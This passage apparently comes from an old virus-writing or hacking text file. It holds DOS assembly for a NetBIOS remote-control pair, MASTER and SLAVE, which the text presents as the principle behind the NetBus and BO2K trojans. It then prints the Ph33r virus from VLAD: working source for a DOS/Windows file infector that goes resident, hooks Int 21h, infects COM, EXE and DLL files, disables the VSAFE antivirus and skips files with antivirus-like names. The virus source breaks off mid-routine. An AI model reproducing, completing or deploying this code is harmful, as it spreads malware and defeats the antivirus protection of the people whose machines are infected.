RECEIVE_ANY_WAIT = 016h SESSION_STATUS = 0b4h SESSION_STATUS_WAIT = 034h SEND_DATAGRAM = 0a0h SEND_DATAGRAM_WAIT = 020h SEND_BCST_DATAGRAM = 0a2h SEND_BCST_DATAGRAM_WAIT = 022h RECEIVE_DATAGRAM = 0a1h RECEIVE_DATAGRAM_WAIT = 021h RECEIVE_BCST_DATAGRAM = 0a3h RECEIVE_BCST_DATAGRAM_WAIT = 023h NCB struc COMMAND db ? RETCODE db ? LSN db ? NUM db ? BUFFER_PTR dd ? LEN dw ? CALLNAME db 16 dup (?) OURNAME db 16 dup (?) RTO db ? STO db ? POST_FUNC dd ? LANA_NUM db ? CMD_CPLT db ? RESERVE db 14 dup (?) NCB EndS .DATA Msg2 DB "Looking for SLAVE -- Press ESC to quit." DB 13, 10 Msg2Len = $-Msg2 Msg3 DB "Early versions of DOS not supported." DB 13, 10 Msg3Len = $-Msg3 Msg4 DB "ERROR--NETBIOS not active." DB 13, 10 Msg4Len = $-Msg4 Msg5 DB "Adding name to network..." DB 13, 10 Msg5Len = $-Msg5 Msg6 DB "ERROR -- SLAVE not found." DB 13, 10 Msg6Len = $-Msg6 Msg8 DB 13, 10, 13, 10 DB "MASTER finished." DB 13, 10 Msg8Len = $-Msg8 dos_major DB 0 dos_minor DB 0 EGAFlagPtr Label DWord EGAFlagOfs DW 0487h EGAFlagSeg DW 0 VideoPtr Label DWord VideoOfs DW 0 VideoSeg DW 0 Done DB 1 OurNameNumber DB 0 LocSave DW 0 ShapeSave DW 0 slave_name DB "Slave " DB 0 master_name DB "Master " DB 0 send_ncb NCB <> recv_ncb NCB <> add_name_ncb NCB <> delete_name_ncb NCB <> cncl_ncb NCB <> Screen_Data Label Byte ScreenPos DW 0 CursorShape DW 0 CursorLoc DW 0 Head2 DW 0 ScreenPkt DB 500 Dup(0) Kbd_Data Label Byte KbdFlag1 DB 0 KbdFlag2 DB 0 AltInput DB 0 Sess_Flag DW 0 Tail DW 0 KbdBuffer DW 16 Dup(0) .STACK 200h .CODE scan_code DB 0 In_Int10 DB 0 oldint09 Label DWord oldint09_ofs DW 0 oldint09_seg DW 0 oldint10 Label DWord oldint10_ofs DW 0 oldint10_seg DW 0 SS_Save1 DW 0 SP_Save1 DW 0 StackSeg1 DW 0 StackOfs1 DW 0 DW 256 Dup(0) OurStack1 DW 0 SS_Save2 DW 0 SP_Save2 DW 0 StackSeg2 DW 0 StackOfs2 DW 0 DW 256 Dup(0) OurStack2 DW 0 ;--------------------------------------- Assume CS:_TEXT, DS:_DATA, ES:Nothing Add_Our_Name Proc Near mov add_name_ncb.COMMAND, ADD_NAME push ds pop es mov si, offset master_name mov di, offset add_name_ncb.OURNAME mov cx, 8 rep movsw mov word ptr add_name_ncb.POST_FUNC+2, 0 mov word ptr add_name_ncb.POST_FUNC, 0 mov add_name_ncb.CMD_CPLT, 0FFh mov bx, offset add_name_ncb Int 5Ch wait_add: cmp add_name_ncb.CMD_CPLT, 0FFh je wait_add ret Add_Our_Name EndP Delete_Our_Name Proc Near push ds pop es mov delete_name_ncb.COMMAND, DELETE_NAME mov si, offset master_name mov di, offset delete_name_ncb.OURNAME mov cx, 8 rep movsw mov word ptr delete_name_ncb.POST_FUNC+2, 0 mov word ptr delete_name_ncb.POST_FUNC, 0 mov delete_name_ncb.CMD_CPLT, 0FFh mov bx, offset delete_name_ncb Int 5Ch wait_delete: cmp delete_name_ncb.CMD_CPLT, 0FFh je wait_delete ret Delete_Our_Name EndP Cancel_Recv Proc Near push ds pop es mov cncl_ncb.COMMAND, CANCEL mov ax, offset recv_ncb mov word ptr cncl_ncb.BUFFER_PTR, ax mov word ptr cncl_ncb.BUFFER_PTR+2, ds mov bx, offset cncl_ncb int 5Ch ret Cancel_Recv EndP ; ; enter Receive with: ; DX:AX - address of buffer ; CX - number of bytes to receive ; BP:BX - address of POST routine ; Recv_Msg Proc Near push ds pop es mov recv_ncb.COMMAND, RECEIVE_DATAGRAM push ax mov al, OurNameNumber mov recv_ncb.NUM, al pop ax mov recv_ncb.LEN, CX mov word ptr recv_ncb.BUFFER_PTR+2, dx mov word ptr recv_ncb.BUFFER_PTR, ax mov word ptr recv_ncb.POST_FUNC+2, bp mov word ptr recv_ncb.POST_FUNC, bx mov recv_ncb.CMD_CPLT, 0FFh mov bx, offset recv_ncb Int 5Ch ret Recv_Msg EndP ;--------------------------------------- ; ; enter Send with: ; DX:AX - address of buffer ; CX - number of bytes to send ; BP:BX - address of POST routine ; DS:SI - address of destination name ; Send_Msg Proc Near push ds pop es mov send_ncb.COMMAND, SEND_DATAGRAM lea di, send_ncb.CALLNAME push cx mov cx, 8 rep movsw pop cx push ax mov al, OurNameNumber mov send_ncb.NUM, al pop ax mov send_ncb.LEN, cx mov word ptr send_ncb.BUFFER_PTR+2, dx mov word ptr send_ncb.BUFFER_PTR, ax mov word ptr send_ncb.POST_FUNC+2, bp mov word ptr send_ncb.POST_FUNC, bx mov send_ncb.CMD_CPLT, 0FFh mov bx, offset send_ncb Int 5Ch ret Send_Msg EndP ;--------------------------------------- Assume CS:_TEXT, DS:Nothing, ES:Nothing Int_09: sti push ax I9_get_scan: in al, 60h mov cs:scan_code, al pop ax I9_chain_old: pushf cli call cs:oldint09 cli mov cs:SS_Save1, ss mov cs:SP_Save1, sp mov ss, cs:StackSeg1 mov sp, cs:StackOfs1 sti I9_save_regs: push ax push bx push cx push dx push si push di push bp push ds push es Assume CS:_TEXT, DS:_DATA, ES:Nothing mov ax, @DATA mov ds, ax cld ChkCtrl5: mov ax, 0040h mov es, ax test byte ptr es:[0017h], 04h ; Ctrl jz NotCtrl5 cmp cs:scan_code, 4Ch ; Center 5 je SayToQuit NotCtrl5: jmp I9_SendKbd SayToQuit: mov Done, 1 I9_ChkLastSend: cmp send_ncb.CMD_CPLT, 0FFh je I9_ChkLastSend mov Sess_Flag, -1 mov dx, ds mov ax, offset Kbd_Data mov cx, 39 mov bp, 0 mov bx, 0 mov si, offset slave_name call Send_Msg GotoExit: jmp Int09Exit I9_SendKbd: cmp Done, 0 je Chk_Changed jmp Int09Exit Chk_Changed: mov ax, 0040h mov es, ax mov al, es:[0017h] cmp al, KbdFlag1 jne I9_Send_It mov al, es:[0018h] cmp al, KbdFlag2 jne I9_Send_It mov ax, es:[001Ch] cmp ax, Tail jne I9_Send_It jmp short Int09Exit I9_Send_It: cmp send_ncb.CMD_CPLT, 0FFh je GotoExit I9_SaveKbd: push ds pop es mov ax, 0040h mov ds, ax mov si, 0017h mov di, offset Kbd_Data mov cx, 39 rep movsb push es pop ds mov Sess_Flag, 0 mov dx, ds mov ax, offset Kbd_Data mov cx, 39 mov bp, 0 mov bx, 0 mov si, offset slave_name call Send_Msg Int09Exit: Assume CS:_TEXT, DS:Nothing pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax I9_Sw_Stack2: cli mov ss, cs:SS_Save1 mov sp, cs:SP_Save1 iret ;--------------------------------------- Int_10: mov cs:In_Int10, 1 pushf call cs:OldInt10 mov cs:In_Int10, 0 iret ;--------------------------------------- ScreenRecv: mov cs:SS_Save2, ss mov cs:SP_Save2, sp mov ss, cs:StackSeg2 mov sp, cs:StackOfs2 sti cld push ax push bx push cx push dx push si push di push bp push ds push es Assume CS:_TEXT, DS:_DATA, ES:Nothing mov ax, @DATA mov ds, ax cmp Done, 0 je Chk_RetCode jmp ScreenRecvExit Chk_RetCode: cmp recv_ncb.CMD_CPLT, 0 je EchoScreen jmp RecvScreen2 EchoScreen: les di, VideoPtr add di, ScreenPos mov si, offset ScreenPkt mov cx, 250 rep movsw CheckIn10: cmp cs:In_Int10, 1 je Set_Head CheckShape: mov cx, CursorShape cmp cx, ShapeSave je CheckLocation mov ShapeSave, cx mov ah, 1 int 10h CheckLocation: mov dx, CursorLoc cmp dx, LocSave je Set_Head mov LocSave, dx mov bh, 0 mov ah, 2 int 10h Set_Head: mov ax, 0040h mov es, ax cli mov ax, Head2 mov word ptr es:[001Ah], ax sti RecvScreen2: mov dx, ds mov ax, offset Screen_Data mov cx, 508 mov bp, cs mov bx, offset ScreenRecv call Recv_Msg ScreenRecvExit: Assume CS:_TEXT, DS:Nothing pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax cli mov ss, cs:SS_Save2 mov sp, cs:SP_Save2 iret ;--------------------------------------- Start: Assume CS:_TEXT, DS:_DATA, ES:Nothing mov ax, @DATA mov ds, ax mov ax, cs mov cs:StackSeg1, ax mov ax, offset OurStack1 mov cs:StackOfs1, ax mov ax, cs mov cs:StackSeg2, ax mov ax, offset OurStack2 mov cs:StackOfs2, ax get_dos_vers: mov ax, 3000h int 21h mov dos_major, al mov dos_minor, ah cmp al, 2 ja netbios_test1 wrong_dos: mov bx, 2 mov dx, offset Msg3 mov cx, Msg3Len mov ah, 40h int 21h mov ax, 4C00h int 21h netbios_test1: mov ax, 0 mov es, ax cmp word ptr es:[0170h], 0 jne netbios_test2 no_netbios: mov bx, 2 mov dx, offset Msg4 mov cx, Msg4Len mov ah, 40h int 21h mov ax, 4C00h int 21h netbios_test2: mov send_ncb.COMMAND, 7Fh mov send_ncb.RETCODE, 0 mov send_ncb.CMD_CPLT, 0FFh mov ax, ds mov es, ax mov bx, offset send_ncb Int 5Ch cmp send_ncb.RETCODE, 3 jne no_netbios bw_or_color: mov ah, 0Fh int 10h Cmp AL, 7 JE SetMono Jmp LookFurther SetMono: Mov VideoSeg, 0B000h Mov VideoOfs, 0000 Jmp network_name LookFurther: Mov bx, 0FF10h Mov ah, 12h Int 10h Test bh, 0FEh JZ EGAPresent Jmp SetCGA EGAPresent: LES BX, EGAFlagPtr Mov AL, Byte Ptr ES:[BX] Test AL, 00000101b JNZ SetCGA Test AL, 00000100b JNZ SetMono Test AL, 00000001b JNZ SetMono EGAIsActive: Mov VideoSeg, 0B800h Mov VideoOfs, 0000 Jmp network_name SetCGA: Mov VideoSeg, 0B800h Mov VideoOfs, 0000 network_name: mov bx, 2 mov dx, offset Msg5 mov cx, Msg5Len mov ah, 40h int 21h call Add_Our_Name mov al, add_name_ncb.NUM mov OurNameNumber, al cmp add_name_ncb.CMD_CPLT, 0 je say_hello jmp prog_exit say_hello: mov bx, 2 mov dx, offset Msg2 mov cx, Msg2Len mov ah, 40h int 21h Ping_Slave: mov Sess_Flag, 1 mov dx, ds mov ax, offset Kbd_Data mov cx, 39 mov bp, 0 mov bx, 0 mov si, offset slave_name call Send_Msg mov dx, ds mov ax, offset Screen_Data mov cx, 8 mov bp, 0 mov bx, 0 call Recv_Msg Wait_Ping: cmp recv_ncb.CMD_CPLT, 0FFh jne Pinged_Back mov ah, 1 int 16h jz Wait_Ping mov ah, 0 int 16h cmp al, 27 jne Wait_Ping Ping_Error: mov bx, 2 mov dx, offset Msg6 mov cx, Msg6Len mov ah, 40h int 21h call Delete_Our_Name jmp prog_exit Pinged_Back: cmp recv_ncb.CMD_CPLT, 0 jne Ping_Error ChkPing: cmp ScreenPos, -1 jne Ping_Error ResetKBD: mov ax, 0040h mov es, ax cli mov byte ptr es:[0017h], 0 mov byte ptr es:[0018h], 0 mov ax, word ptr es:[0080h] mov word ptr es:[001Ah], ax mov word ptr es:[001Ch], ax sti mov ax, ds mov es, ax save_int9: mov ax, 3509h int 21h mov cs:oldint09_seg, ES mov cs:oldint09_ofs, BX save_int10: mov ax, 3510h int 21h mov cs:oldint10_seg, ES mov cs:oldint10_ofs, BX install_int9: push ds mov dx, offset Int_09 push cs pop ds mov ax, 2509h int 21h pop ds install_int10: push ds mov dx, offset Int_10 push cs pop ds mov ax, 2510h int 21h pop ds RecvScreen: mov dx, ds mov ax, offset Screen_Data mov cx, 508 mov bp, cs mov bx, offset ScreenRecv call Recv_Msg mov Done, 0 while_not_done: cmp Done, 0 je while_not_done deinstall_int9: push ds mov dx, cs:oldint09_ofs mov ds, cs:oldint09_seg mov ax, 2509h int 21h pop ds deinstall_10: push ds mov dx, cs:oldint10_ofs mov ds, cs:oldint10_seg mov ax, 2510h int 21h pop ds ResetKBD2: mov ax, 0040h mov es, ax cli mov byte ptr es:[0017h], 0 mov byte ptr es:[0018h], 0 mov ax, word ptr es:[0080h] mov word ptr es:[001Ah], ax mov word ptr es:[001Ch], ax sti mov ax, ds mov es, ax CnclRecv: call Cancel_Recv remove_name: call Delete_Our_Name prog_exit: mov bx, 2 mov dx, offset Msg8 mov cx, Msg8Len mov ah, 40h int 21h mov ax, 4C00h int 21h End Start [END MASTER.ASM] Now for the slave. [BEGIN SLAVE.ASM] ;---------------------------------------------------- ; ; SLAVE -- allow another PC (on a Netbios LAN) ; to control this one. (see MASTER.ASM) ; ; Test version 0.9 ; ; (c) 1990 Barry Nance ; ;---------------------------------------------------- DOSSEG .MODEL small StdIn = 0000 StdOut = 0001 StdErr = 0002 RESET = 032h CANCEL = 035h STATUS = 0b3h STATUS_WAIT = 033h TRACE = 0f9h TRACE_WAIT = 079h UNLINK = 070h ADD_NAME = 0b0h ADD_NAME_WAIT = 030h ADD_GROUP_NAME = 0b6h ADD_GROUP_NAME_WAIT = 036h DELETE_NAME = 0b1h DELETE_NAME_WAIT = 031h CALL_CMD = 090h CALL_WAIT = 010h LISTEN = 091h LISTEN_WAIT = 011h HANG_UP = 092h HANG_UP_WAIT = 012h SEND = 094h SEND_WAIT = 014h SEND_NO_ACK = 0f1h SEND_NO_ACK_WAIT = 071h CHAIN_SEND = 097h CHAIN_SEND_WAIT = 017h CHAIN_SEND_NO_ACK = 0f2h CHAIN_SEND_NO_ACK_WAIT = 072h RECEIVE = 095h RECEIVE_WAIT = 015h RECEIVE_ANY = 096h RECEIVE_ANY_WAIT = 016h SESSION_STATUS = 0b4h SESSION_STATUS_WAIT = 034h SEND_DATAGRAM = 0a0h SEND_DATAGRAM_WAIT = 020h SEND_BCST_DATAGRAM = 0a2h SEND_BCST_DATAGRAM_WAIT = 022h RECEIVE_DATAGRAM = 0a1h RECEIVE_DATAGRAM_WAIT = 021h RECEIVE_BCST_DATAGRAM = 0a3h RECEIVE_BCST_DATAGRAM_WAIT = 023h NCB struc COMMAND db ? RETCODE db ? LSN db ? NUM db ? BUFFER_PTR dd ? LEN dw ? CALLNAME db 16 dup (?) OURNAME db 16 dup (?) RTO db ? STO db ? POST_FUNC dd ? LANA_NUM db ? CMD_CPLT db ? RESERVE db 14 dup (?) NCB EndS .DATA EGAFlagPtr Label DWord EGAFlagOfs DW 0487h EGAFlagSeg DW 0 Msg1 DB "SLAVE is now waiting for MASTER to make contact." DB 13, 10 Msg1Len = $-Msg1 Msg2 DB "Early versions of DOS not supported." DB 13, 10 Msg2Len = $-Msg2 Msg3 DB "Error--NETBIOS not active." DB 13, 10 Msg3Len = $-Msg3 Msg4 DB "Adding name to network..." DB 13, 10 Msg4Len = $-Msg4 .STACK 200h .CODE ;--------------------------------------- our_psp DW 0 our_mcb_seg DW 0 next_mcb_seg DW 0 dos_major DB 0 dos_minor DB 0 SessionActive DB 0 OurNameNumber DB 0 InInt8 DB 0 slave_name DB "Slave " DB 0 master_name DB "Master " DB 0 send_ncb NCB <> recv_ncb NCB <> add_name_ncb NCB <> delete_name_ncb NCB <> oldint08 Label DWord oldint08_ofs DW 0 oldint08_seg DW 0 VideoPtr Label DWord VideoOfs DW 0 VideoSeg DW 0 ScreenSave DB 4000 Dup(0) Screen_Data Label Byte ScreenPos DW 0 CursorShape DW 0 CursorLoc DW 0 Head2 DW 0 ScreenPkt DB 500 Dup(0) Kbd_Data Label Byte KbdFlag1 DB 0 KbdFlag2 DB 0 AltInput DB 0 Sess_Flag DW 0 Tail DW 0 KbdBuffer DW 16 Dup(0) QuadrantCounter DW 0 Quadrant DW 8 Quadrant_Ofs DW 0 SS_Save1 DW 0 SP_Save1 DW 0 StackSeg1 DW 0 StackOfs1 DW 0 DW 256 Dup(0) OurStack1 DW 0 SS_Save2 DW 0 SP_Save2 DW 0 StackSeg2 DW 0 StackOfs2 DW 0 DW 256 Dup(0) OurStack2 DW 0 ;--------------------------------------- Assume CS:_TEXT, DS:_TEXT, ES:Nothing Add_Our_Name Proc Near push ds push cs pop ds push cs pop es mov add_name_ncb.COMMAND, ADD_NAME mov si, offset slave_name mov di, offset add_name_ncb.OURNAME mov cx, 8 rep movsw mov word ptr add_name_ncb.POST_FUNC+2, 0 mov word ptr add_name_ncb.POST_FUNC, 0 mov add_name_ncb.CMD_CPLT, 0FFh mov bx, offset add_name_ncb Int 5Ch wait_add: cmp add_name_ncb.CMD_CPLT, 0FFh je wait_add pop ds ret Add_Our_Name EndP ; ; enter Send with: ; DX:AX - address of buffer ; CX - number of bytes to send ; BP:BX - address of POST routine ; DS:SI - address of destination name ; Send_Msg Proc Near push ds push cs pop ds push cs pop es mov send_ncb.COMMAND, SEND_DATAGRAM lea di, send_ncb.CALLNAME push ax push cx mov cx, 8 rep movsw mov al, OurNameNumber mov send_ncb.NUM, al pop cx pop ax mov send_ncb.LEN, cx mov word ptr send_ncb.BUFFER_PTR+2, dx mov word ptr send_ncb.BUFFER_PTR, ax mov word ptr send_ncb.POST_FUNC+2, bp mov word ptr send_ncb.POST_FUNC, bx mov send_ncb.CMD_CPLT, 0FFh mov bx, offset send_ncb int 5Ch pop ds ret Send_Msg EndP Recv_Msg Proc Near push ds push cs pop ds push cs pop es push ax mov recv_ncb.COMMAND, RECEIVE_DATAGRAM mov al, OurNameNumber mov recv_ncb.NUM, al mov recv_ncb.LEN, cx pop ax mov word ptr recv_ncb.BUFFER_PTR+2, dx mov word ptr recv_ncb.BUFFER_PTR, ax mov word ptr recv_ncb.POST_FUNC+2, bp mov word ptr recv_ncb.POST_FUNC, bx mov recv_ncb.CMD_CPLT, 0FFh mov bx, offset recv_ncb Int 5Ch pop ds ret Recv_Msg EndP Assume CS:_TEXT, DS:Nothing, ES:Nothing Int_08: pushf call cs:oldint08 I8_Sw_Stack1: mov cs:SS_Save1, ss mov cs:SP_Save1, sp mov ss, cs:StackSeg1 mov sp, cs:StackOfs1 sti cld I8_save_regs: push ax push bx push cx push dx push si push di push bp push ds push es Assume CS:_TEXT, DS:_TEXT mov ax, cs mov ds, ax mov QuadrantCounter, 0 I8_Semaphore: Cmp InInt8, 0 JE I8_Sess_Switch Jmp I8_RestoreRegs I8_Sess_Switch: cmp SessionActive, 1 je I8_ChkHotIRQs br_to_exit: jmp Int08Exit I8_ChkHotIRQs: mov InInt8, 1 Mov AL, 0bh Out 20h, AL In AL, 20h Cmp AL, 0 JE I8_ChkScreen Jmp Int08Exit I8_ChkScreen: cmp send_ncb.CMD_CPLT, 0FFh je br_to_exit Next_Quadrant: inc Quadrant add Quadrant_Ofs, 500 cmp Quadrant, 9 jne ChkThisSection mov Quadrant, 1 mov Quadrant_Ofs, 0 ChkThisSection: les di, VideoPtr mov ax, Quadrant_Ofs mov si, offset ScreenSave add si, ax add di, ax mov cx, 250 repe cmpsw jne I8_SaveScreen inc QuadrantCounter cmp QuadrantCounter, 8 je ChkShape jmp I8_ChkScreen ChkShape: mov ax, 0040h mov es, ax mov ax, word ptr es:[0060h] cmp ax, CursorShape jne I8_SaveScreen mov ax, word ptr es:[0050h] cmp ax, CursorLoc jne I8_SaveScreen jmp Int08Exit I8_SaveScreen: push cs pop es mov ax, Quadrant_Ofs mov di, offset ScreenSave lds si, VideoPtr add si, ax add di, ax mov cx, 250 rep movsw push cs pop ds I8_BldPacket: mov ax, Quadrant_Ofs mov ScreenPos, ax mov ax, 0040h mov es, ax mov ax, word ptr es:[0060h] mov CursorShape, ax mov ax, word ptr es:[0050h] mov CursorLoc, ax mov ax, word ptr es:[001Ah] mov Head2, ax mov ax, cs mov es, ax mov si, offset ScreenSave add si, Quadrant_Ofs mov di, offset ScreenPkt mov cx, 250 rep movsw I8_SendScreen: mov dx, cs mov ax, offset Screen_Data mov cx, 508 mov bp, 0 mov bx, 0 mov si, offset master_name call Send_Msg Int08Exit: mov InInt8, 0 I8_RestoreRegs: pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax I8_Sw_Stack2: cli mov ss, cs:SS_Save1 mov sp, cs:SP_Save1 iret Assume CS:_TEXT, DS:Nothing ;--------------------------------------- Kbd_Receive: mov cs:SS_Save2, ss mov cs:SP_Save2, sp mov ss, cs:StackSeg2 mov sp, cs:StackOfs2 sti cld push ax push bx push cx push dx push si push di push bp push ds push es Assume CS:_TEXT, DS:_TEXT mov ax, cs mov ds, ax Chk_RetCode: cmp recv_ncb.CMD_CPLT, 0 je ChkDone jmp KR_RecvKbd ChkDone: cmp Sess_Flag, -1 je KR_CloseSess cmp Sess_Flag, 1 je KR_OpenSess jmp KR_StuffBuffer KR_CloseSess: mov SessionActive, 0 mov ax, 0040h mov es, ax cli mov byte ptr es:[0017h], 0 mov byte ptr es:[0018h], 0 mov ax, word ptr es:[0080h] mov word ptr es:[001Ah], ax mov word ptr es:[001Ch], ax sti mov ax, ds mov es, ax jmp KR_RecvKbd KR_OpenSess: mov ax, 0040h mov es, ax cli mov byte ptr es:[0017h], 0 mov byte ptr es:[0018h], 0 mov ax, word ptr es:[0080h] mov word ptr es:[001Ah], ax mov word ptr es:[001Ch], ax sti mov ax, ds mov es, ax KR_ResetScrn: mov di, offset ScreenSave mov ax, 0 mov cx, 2000 rep stosw mov CursorShape, 0 mov CursorLoc, 0 PingBack: mov ScreenPos, -1 mov dx, cs mov ax, offset Screen_Data mov cx, 8 mov bp, 0 mov bx, 0 mov si, offset master_name call Send_Msg KR_WaitCplt: cmp send_ncb.CMD_CPLT, 0FFh je KR_WaitCplt mov SessionActive, 1 jmp KR_RecvKbd KR_StuffBuffer: mov ax, 0040h mov es, ax cli mov al, KbdFlag1 mov byte ptr es:[0017h], al mov al, KbdFlag2 mov byte ptr es:[0018h], al mov al, AltInput mov byte ptr es:[0019h], al mov ax, Tail mov word ptr es:[001Ch], ax mov di, 001Eh mov si, offset KbdBuffer mov cx, 16 rep movsw sti KR_RecvKbd: mov dx, cs mov ax, offset Kbd_Data mov cx, 39 mov bp, cs mov bx, offset Kbd_Receive call Recv_Msg Assume CS:_TEXT, DS:Nothing Kbd_Exit: pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax cli mov ss, cs:SS_Save2 mov sp, cs:SP_Save2 iret ;--------------------------------------- EndResident Label Byte DB 0 ;--------------------------------------- Start: Assume CS:_TEXT, DS:_DATA, ES:Nothing mov ax, @DATA mov ds, ax mov ax, cs mov cs:StackSeg1, ax mov ax, offset OurStack1 mov cs:StackOfs1, ax mov ax, cs mov cs:StackSeg2, ax mov ax, offset OurStack2 mov cs:StackOfs2, ax save_int8: mov ax, 3508h int 21h mov cs:oldint08_seg, ES mov cs:oldint08_ofs, BX get_dos_vers: mov ax, 3000h int 21h mov cs:dos_major, al mov cs:dos_minor, ah cmp al, 2 ja netbios_test1 wrong_dos: mov bx, 2 mov dx, offset Msg2 mov cx, Msg2Len mov ah, 40h int 21h mov ax, 4C00h int 21h netbios_test1: mov ax, 0 mov es, ax cmp word ptr es:[0170h], 0 jne netbios_test2 no_netbios: mov bx, 2 mov dx, offset Msg3 mov cx, Msg3Len mov ah, 40h int 21h prog_exit: mov ax, 4C00h int 21h netbios_test2: mov cs:send_ncb.COMMAND, 7Fh mov cs:send_ncb.RETCODE, 0 mov cs:send_ncb.CMD_CPLT, 0FFh mov ax, cs mov es, ax mov bx, offset send_ncb Int 5Ch cmp cs:send_ncb.RETCODE, 3 jne no_netbios bw_or_color: mov ah, 0Fh int 10h Cmp AL, 7 JE SetMono Jmp LookFurther SetMono: Mov cs:VideoSeg, 0B000h Mov cs:VideoOfs, 0000 Jmp get_psp LookFurther: Mov bx, 0FF10h Mov ah, 12h Int 10h Test bh, 0FEh JZ EGAPresent Jmp SetCGA EGAPresent: LES BX, EGAFlagPtr Mov AL, Byte Ptr ES:[BX] Test AL, 00000101b JNZ SetCGA Test AL, 00000100b JNZ SetMono Test AL, 00000001b JNZ SetMono EGAIsActive: Mov cs:VideoSeg, 0B800h Mov cs:VideoOfs, 0000 Jmp get_psp SetCGA: Mov cs:VideoSeg, 0B800h Mov cs:VideoOfs, 0000 get_psp: mov ax, 5100h int 21h mov cs:our_psp, bx dec bx mov cs:our_mcb_seg, bx network_name: mov bx, 2 mov dx, offset Msg4 mov cx, Msg4Len mov ah, 40h int 21h call Add_Our_Name mov al, cs:add_name_ncb.NUM mov cs:OurNameNumber, al cmp cs:add_name_ncb.CMD_CPLT, 0 je install_int8 jmp prog_exit install_int8: push ds mov dx, offset Int_08 push cs pop ds mov ax, 2508h int 21h pop ds say_hello: mov bx, 2 mov dx, offset Msg1 mov cx, Msg1Len mov ah, 40h int 21h First_Recv: mov dx, cs mov ax, offset Kbd_Data mov cx, 39 mov bp, cs mov bx, offset Kbd_Receive call Recv_Msg issue_tsr: Mov AX, cs Sub AX, cs:our_psp Mov BX, Offset EndResident Mov CX, 4 Shr BX, CL Inc BX Add AX, BX Mov DX, AX Mov AH, 31h Int 21h End Start [END SLAVE.ASM] The program is indeed very basic, but it shows the principle behind NetBus and BO2K [---------------------------------] 4. The Ph33r virus from VLAD ~~ ~~~ ~~~~~ ~~~~~ ~~~~ ~~~~ NOTE: This virus was written for the A86 assembler. ; ; ; Ph33r ; ; Qark/VLAD ; ; ; ; This virus is the first ever DOS/Windows virus, infecting COM/EXE/WinEXE ; files. ; The technology of the Windows infection is superior to 'Winsurfer' ; in that the virus goes directly resident, without having to mess around ; infecting the Windows 'shell'. The Windows entry of the virus allocates ; memory, points a selector to it, copies the virus into the space and ; sets interrupt 21h to the resident virus. By careful programming it was ; possible to make both the DOS and Win interrupt handlers share the same ; code. ; ; The virus does a few interesting things: ; Disables MSAV by turning it off (DOS) ; Gets the original Int 21h using DOSSEG:109Eh (DOS) ; Won't infect a number of filenames 'AV' 'AN' 'OT' (DOS & Win) ; ; A few annoying things: ; If the DOS handler traps Int 21h AH=3Dh Windows crashes on load. ; If the virus infects WIN386.EXE Windows crashes on load. ; These have both been fixed, by removal. ; ; For some unknown reason, the virus causes Debug to crash on exit. ; I haven't fixed this, because I figure anyone who uses Debug will spot ; the virus anyway. Besides which, I haven't got a clue why it's happening :) ; ; For this virus, AVP & TBAV pick up nothing whilst F-Prot detects it ; heuristically. ; org 0 com_entry: ;COM files begin execution here. call exec_start push es pop ds ;COM file exit. mov di,100h push di db 0b8h ;MOV AX,xxxx old2 dw 20cdh stosw db 0b8h ;MOV AX,xxxx old4 dw 0 stosw xor ax,ax xor bx,bx xor cx,cx xor dx,dx xor si,si xor di,di ret exe_entry: ;EXE files begin execution here. call exec_start push es pop ds ;Setup ss:sp mov ax,ds add ax,10h db 5 ;ADD AX,xxxx old_ss dw 0 mov ss,ax db 0bch ;MOV SP,xxxx old_sp dw 0 ;setup the return mov ax,ds add ax,10h db 5 ;ADD AX,xxxx exe_cs dw 0 push ax db 0b8h ;MOV AX,xxxx exe_ip dw 0 push ax xor ax,ax xor bx,bx xor cx,cx xor dx,dx xor si,si xor di,di retf Exec_Start: cld mov ax,51ffh ;Test resident. int 21h cmp ax,0ff51h je exit_virus mov ax,0fa02h ;Kill VSAFE. mov dx,5945h ;Every DOS6+ user has a copy of this. xor bl,bl int 16h mov ax,ds dec ax mov ds,ax ;MCB seg in DS. xor di,di cmp byte ptr [di],'Y' ;Z block ? ja allocate exit_virus: ret allocate: sub word ptr [di+3],(offset virus_size*2/16)+1 sub word ptr [di+12h],(offset virus_size*2/16)+1 mov ax,word ptr [di+12h] push es mov es,ax push cs pop ds mov cx,offset virus_size ;Get delta offset in SI call next next: pop si sub si,offset next ;Move virus to free memory. rep movsb mov ds,cx ;DS=CX=0 from REP MOVSB ;Set int21h mov si,21h*4 mov di,offset i21 push si movsw movsw pop si mov di,offset orig21 movsw movsw mov word ptr [si-4],offset int21handler mov word ptr [si-2],es push es mov ah,52h ;Thanx Neurobasher! int 21h mov ax,es pop es mov ds,ax mov si,109eh ;DS:109Eh = Original Int 21 I hope. lodsw cmp ax,9090h jne reset21 lodsb cmp al,0e8h jne reset21 mov word ptr es:orig21,10a0h mov word ptr es:orig21+2,ds reset21: pop es ret db '=Ph33r=' win21: ;Windows interrupt handling begins here. cmp ax,51feh jne non_w_res xchg al,ah iret non_w_res: cmp ax,4b00h ;Execute. je check_infect cmp ah,3dh ;File Open. je check_infect cmp ah,56h ;Rename. je check_infect cmp ah,43h ;Chmod. jne int_exit check_infect: pushf pusha push ds push es mov ax,0ah ;This function makes our CS writable. mov bx,cs int 31h mov es,ax call setup_infect pop es pop ds popa popf jmp int_exit int21handler: ;DOS interrupt handling begins here. cmp ax,51ffh jne non_res xchg al,ah iret db 'Qark/VLAD' non_res: ;For some reason, checking for AH=3dh crashes windows when its booting. cmp ax,4b00h ;Execute. je do_file cmp ah,6ch ;Open. je do_file cmp ah,56h ;Rename. je do_file cmp ah,43h ;Chmod. je do_file int_exit: db 0eah i21 dd 0 do_file: push es push dx cmp ah,6ch jne no_6c_fix mov dx,si no_6c_fix: push cs pop es call setup_infect pop dx pop es jmp int_exit setup_infect: ;on entry to this call, es=writable cs ;ds:dx=filename pushf push ax push bx push cx push dx push si push di push ds push es cld mov si,dx asciiz: lodsb cmp al,0 jne asciiz sub si,4 lodsw or ax,2020h cmp ax,'xe' ;EXE je do_inf cmp ax,'ld' ;DLL je do_inf cmp ax,'oc' ;COM jne not_name do_inf: cmp word ptr [si-5],'68' ;Dont infect WIN386.EXE (hangs) je not_name mov ax,word ptr [si-5] or ax,2020h ;Lowercase. cmp ax,'va' ;Don't touch files that end in AV je not_name ;eg TBAV cmp ax,'vd' ;DV.COM checks DV.EXE je not_name cmp ax,'na' ;Don't touch files that end in AN je not_name ;eg SCAN, TBSCAN cmp ax,'to' ;Don't touch files that end in OT je not_name 